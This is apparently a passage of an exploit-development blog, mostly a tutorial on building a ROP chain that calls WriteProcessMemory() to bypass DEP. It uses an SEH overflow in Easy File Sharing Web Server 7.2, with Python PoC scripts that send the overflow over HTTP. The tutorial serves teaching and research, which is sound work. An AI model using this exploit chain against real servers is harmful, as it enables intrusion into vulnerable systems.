I think personally that XFG is an awesome and pretty creative mitigation, and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. However, it remains to be seen how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also a part of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t as used anymore in typical red team toolkits and explain although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs- is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation- which is often one of the more difficult parts of a penetration test. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00

Introduction

The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the “swiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives- as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for)- and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an “ASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment- and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 4063 bytes, and the stack pivot lands 2563 bytes into our buffer. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done in a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will move the stack pointer from a location we do not control to an address on the stack that we do control- and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit PoC- we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of note, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is not to dynamically change the permissions of memory to make it executable- but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable- but not both at the same time. The previous statement about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination- even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this has a practical consequence. Some shellcode employs encoding mechanisms to bypass character filtering. In that case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is because the encoded shellcode needs to “write itself” over adjacent process memory in order to decode. Since the pages are execute only, and we no longer have the WriteProcessMemory() “pass” to write to execute only memory, an access violation will occur. Something to definitely keep in mind.
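To make the behavior described above a bit more concrete, here is a toy Python model. This is only a sketch and not how Windows implements anything: the Page class, its protection strings, and the api_write helper are hypothetical names invented for illustration.

```python
class Page:
    """Toy stand-in for a memory page with a protection string such as 'r-x'."""

    def __init__(self, size, protect):
        self.data = bytearray(size)
        self.protect = protect

    def write(self, offset, payload):
        # An ordinary write, as performed by code running inside the process.
        if "w" not in self.protect:
            raise PermissionError("access violation: page is not writable")
        self.data[offset:offset + len(payload)] = payload


def api_write(page, offset, payload):
    """Models the behavior described above: relax protection, write, restore."""
    original = page.protect
    page.protect = "rwx"
    try:
        page.write(offset, payload)
    finally:
        page.protect = original


code_cave = Page(16, "r-x")

# The "proxied" write succeeds even though the page is not writable.
api_write(code_cave, 0, b"\x90\x90\x90\x90")

try:
    # A self-decoding payload would later attempt a plain write like this one.
    code_cave.write(0, b"\xcc")
    decoder_survived = True
except PermissionError:
    decoder_survived = False
```

In this model the proxied write lands and the page returns to its original protection, while the later plain write (what a decoder stub would do) is rejected.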

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a “reference” or “index” to an object. Generally, a handle is used as a “proxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as “don’t talk to me, talk to my assistant”, where the process is the “me” and the handle is the “assistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which receives the old permissions of modified memory. However, our parameter receives the number of bytes written. This will need to be a memory address, within the process space, that is writable.

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually- each ROP gadget ends with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, load it into RIP (EIP in this case), and advance the stack pointer past it. Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.
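The role of ret can be sketched with a small Python model. This is a toy under stated assumptions: the gadget "addresses" 0x1000 and 0x2000, the register values, and the run_chain helper are all hypothetical, and the stack is modeled as a list of DWORDs indexed by a byte offset in ESP.

```python
def pop_ecx(regs, stack, esp):
    # pop ecx: read the DWORD at ESP into ECX, then move ESP past it
    regs["ecx"] = stack[esp // 4]
    return esp + 4


def xchg_eax_ebp(regs, stack, esp):
    # xchg eax, ebp: swap the two registers; ESP is untouched
    regs["eax"], regs["ebp"] = regs["ebp"], regs["eax"]
    return esp


# Hypothetical gadget addresses mapped to their modeled behavior.
GADGETS = {0x1000: pop_ecx, 0x2000: xchg_eax_ebp}


def run_chain(stack, regs):
    esp = 0
    executed = []
    while esp // 4 < len(stack):
        eip = stack[esp // 4]      # ret: load the DWORD at ESP into EIP...
        esp += 4                   # ...and advance ESP past it
        gadget = GADGETS.get(eip)
        if gadget is None:         # not a known gadget: stop the model here
            break
        esp = gadget(regs, stack, esp)
        executed.append(eip)
    return executed


regs = {"eax": 0, "ecx": 0, "ebp": 0x0029F000}
stack = [0x2000, 0x1000, 0xDEADBEEF, 0xCCCCCCCC]
executed = run_chain(stack, regs)
```

Each ret consumes one DWORD from the stack, which is why whoever controls the stack contents controls the order in which gadgets run.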

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature- the stack still seems to change! Although the stack is dynamically being resolved to seemingly “random” and “volatile to the duration of the process” memory- there is a way around this. If we can use a ROP gadget, or set of gadgets, properly- we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the “bottom” of the current stack frame (we will refer to the current stack frame as “the stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post)- a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another “common” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

Although EAX is relatively close to ESP- it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another “common” register, ECX. ECX is a register that is used as a “counter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, ESP will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, which is collateral damage we accept in order to get what we need accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is the reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24: we will need 0x14 bytes worth of ROP gadgets between now and then. By the time the ROP gadgets before the add esp, 0x24 instruction have executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX would contain a value of ESP + 0x10.
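The offset bookkeeping above can be checked with a few lines of Python. This is only a sketch of the arithmetic; the variable names are made up for illustration.

```python
DWORD = 4

target_offset = 0x38        # offset (relative to ESP) loaded into EAX now
pivot_adjust = 0x24         # the add esp, 0x24 inside the later gadget
stack_slots_consumed = 5    # 4 gadget addresses + 1 DWORD popped into a register

# ESP advances by one DWORD for every slot consumed before the later gadget runs.
bytes_consumed = stack_slots_consumed * DWORD

# EAX stays fixed while ESP moves, so EAX's offset relative to ESP shrinks.
eax_relative_at_gadget = target_offset - bytes_consumed

# Loading ESP + 0x24 now would leave EAX short by the same amount.
too_small = pivot_adjust - bytes_consumed
```

Here bytes_consumed works out to 0x14, eax_relative_at_gadget to 0x24, and too_small to 0x10, matching the numbers in the text.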

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs- we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
0xffffefe0 (Value to be popped into ECX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38).
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes- which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.
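As a quick sanity check of the negative representation, here is a small Python sketch. The helper names neg32 and sub32 and the starting value of EAX are hypothetical; the value 0xffffefe0 is the one used in the chain above.

```python
import struct

MASK32 = 0xFFFFFFFF


def neg32(value):
    """Two's-complement encoding of -value as an unsigned 32-bit integer."""
    return (-value) & MASK32


def sub32(a, b):
    """Model of a 32-bit sub instruction, which wraps around on overflow."""
    return (a - b) & MASK32


distance = 0x1020
encoded = neg32(distance)            # the DWORD that gets popped into ECX

eax = 0x0029F000                     # hypothetical starting value of EAX
result = sub32(eax, encoded)         # subtracting the negative adds the distance

# The plain distance packs with NULL bytes; the negative encoding does not.
has_null_plain = b"\x00" in struct.pack("<L", distance)
has_null_encoded = b"\x00" in struct.pack("<L", encoded)
```

Subtracting 0xffffefe0 from EAX has the same effect as adding 0x1020, and the packed DWORD is free of NULL bytes.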

After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur- which is meaningless because ECX and EAX already contain the same value- meaning this part of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for- so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that EAX currently contains our target address. We can also recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes, the mov esp, ebp portion of leave (which sets ESP to whatever EBP is) would set ESP to our target address. Because the add esp, 0x24 instruction runs before leave, ESP will already have reached that same address by then- so mov esp, ebp essentially sets ESP back to where it already was (undoing only the 4 bytes consumed by pop ebx), which is what we want. The goal here is to keep ESP pointing at our controlled data, which consists of our ROP gadgets.

It is a bit of a mouthful and a “mind bender” of sorts- so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget- obviously the value of ESP changes. For completeness’ sake, until we hit the add esp, 0x24 gadget- we will refer to the “target” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP- essentially “moving” the address into EBP.

Let’s step through all of this in WinDbg- to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP currently is set to 0 and EAX is set to ESP + 0x38

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget- ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look at the stack now, we can see the padding that compensates for add esp, 0x24 and pop ebx, located just before 0xCCCCCCCC.

Program execution has also reached the add esp, 0x24 instruction.

Stepping through the instruction, ESP has been set to the same value as EAX, ECX, and EBP.

Then, pop ebx clears the last bit of “padding” on the stack.

After all of this has occurred, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course- all while preserving ESP into ECX and EAX!
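The walkthrough above can also be modeled outside the debugger. The following is a toy Python simulation of the gadget, assuming a hypothetical stack base of 0x1000 and a dictionary standing in for stack memory; it is a sketch of the register bookkeeping, not a reproduction of the real process state.

```python
def run_gadget(regs, mem):
    """mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret"""
    regs["ecx"] = regs["eax"]          # mov ecx, eax
    regs["eax"] = regs["ecx"]          # mov eax, ecx (no effect)
    regs["esp"] += 0x24                # add esp, 0x24
    regs["ebx"] = mem[regs["esp"]]     # pop ebx
    regs["esp"] += 4
    regs["esp"] = regs["ebp"]          # leave, part 1: mov esp, ebp
    regs["ebp"] = mem[regs["esp"]]     # leave, part 2: pop ebp
    regs["esp"] += 4
    regs["eip"] = mem[regs["esp"]]     # ret
    regs["esp"] += 4
    return regs


base = 0x1000                          # hypothetical ESP when the gadget starts

# Ten DWORDs of padding, followed by the marker we hope to return into.
mem = {base + i * 4: 0x90909090 for i in range(10)}
mem[base + 0x28] = 0xCCCCCCCC

regs = {
    "eax": base + 0x24,                # prepared earlier with sub eax, ecx
    "ebp": base + 0x24,                # prepared earlier with add ebp, eax
    "ecx": 0,
    "ebx": 0,
    "esp": base,
    "eip": 0,
}
run_gadget(regs, mem)
```

Because EBP was prepared to match the address ESP reaches after add esp, 0x24, the mov esp, ebp inside leave keeps ESP within our padding, and the final ret lands on the 0xCCCCCCCC marker with EAX and ECX both holding the preserved stack address.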

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on- we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)		# Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

Let’s talk about where these parameters come from.

To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t)- we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function- it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these entries points to a Windows API function.

We have “the base address” of each module (in reality, each module is just not compiled with ASLR)- so that is no problem. However, the value that each of these entries holds (which is the address of a Windows API function) will change upon reboot.

The way to get around this would be to load one of these IAT entries into a register we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction- an arbitrary read.

This would extract whatever ECX points to (which is the address of a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API functions, we can still leverage the fact that each IAT entry will always point to the same Windows API function (even if the address of that function changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32!WriteProcessMemory- it does contain pointers to other kernel32.dll functions, such as kernel32!WriteFileImplementation. We also know that the distance between each function within a DLL DOESN’T CHANGE. This means, the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.
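The idea of resolving one function from another can be sketched as follows. Everything numeric here is hypothetical: the RVAs and base addresses are made-up values for illustration and are not real kernel32.dll offsets, and resolve_from_leak is a name invented for this sketch.

```python
MASK32 = 0xFFFFFFFF


def resolve_from_leak(leaked_address, leaked_rva, target_rva):
    """Rebase a target function using one leaked pointer from the same DLL."""
    module_base = (leaked_address - leaked_rva) & MASK32
    return (module_base + target_rva) & MASK32


# Hypothetical RVAs for one specific build of a DLL (not real kernel32 values).
KNOWN_FUNC_RVA = 0x00016000
TARGET_FUNC_RVA = 0x00033000

# Two "boots" with different randomized module base addresses.
first = resolve_from_leak(0x76A00000 + KNOWN_FUNC_RVA, KNOWN_FUNC_RVA, TARGET_FUNC_RVA)
second = resolve_from_leak(0x75120000 + KNOWN_FUNC_RVA, KNOWN_FUNC_RVA, TARGET_FUNC_RVA)

# The distance between the two functions is identical across both boots.
delta = TARGET_FUNC_RVA - KNOWN_FUNC_RVA
```

The absolute addresses differ between the two runs, but the delta between the leaked function and the target function does not, which is what makes the IAT read sufficient for a given patch level.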

crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this will be used as the address to which program execution will transfer AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application- meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory- we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we “proxy” the write through the API call.

Viewing the .text section address- we can see that the address chosen is just an executable “code cave” that does not appear to contain any code or data the program uses- meaning that if we corrupt this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here- program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)		# hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill- we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is a “special” constant that refers to the current process. This means, whenever a Windows API function requests a process handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to operate on the current process. Since we would like to write our shellcode to memory within the process space- passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write to virtual memory within the current process space.
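For anyone wondering why -1 and 0xFFFFFFFF are interchangeable here, a short Python check shows that both pack to the same four bytes on a 32-bit target. The constant name PSEUDO_HANDLE is just a label chosen for this sketch.

```python
import struct

PSEUDO_HANDLE = -1

# Signed 32-bit, little-endian encoding of -1.
as_signed = struct.pack("<l", PSEUDO_HANDLE)

# Unsigned 32-bit, little-endian encoding, as written in the PoC.
as_unsigned = struct.pack("<L", 0xFFFFFFFF)
```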

crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll)

lpBaseAddress will be the address of our shellcode, as already outlined by the “return” parameter.

crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberOfBytesWritten will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86 at least), where we will place these parameter “placeholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)		# xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP- which will compensate for the "leave" in the ROP gadget which moves EAX into ECX)
crash += struct.pack('<L', 0x10018606)		# pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)		# Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)		# sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)		# add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)		# mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)		# add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)		# Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
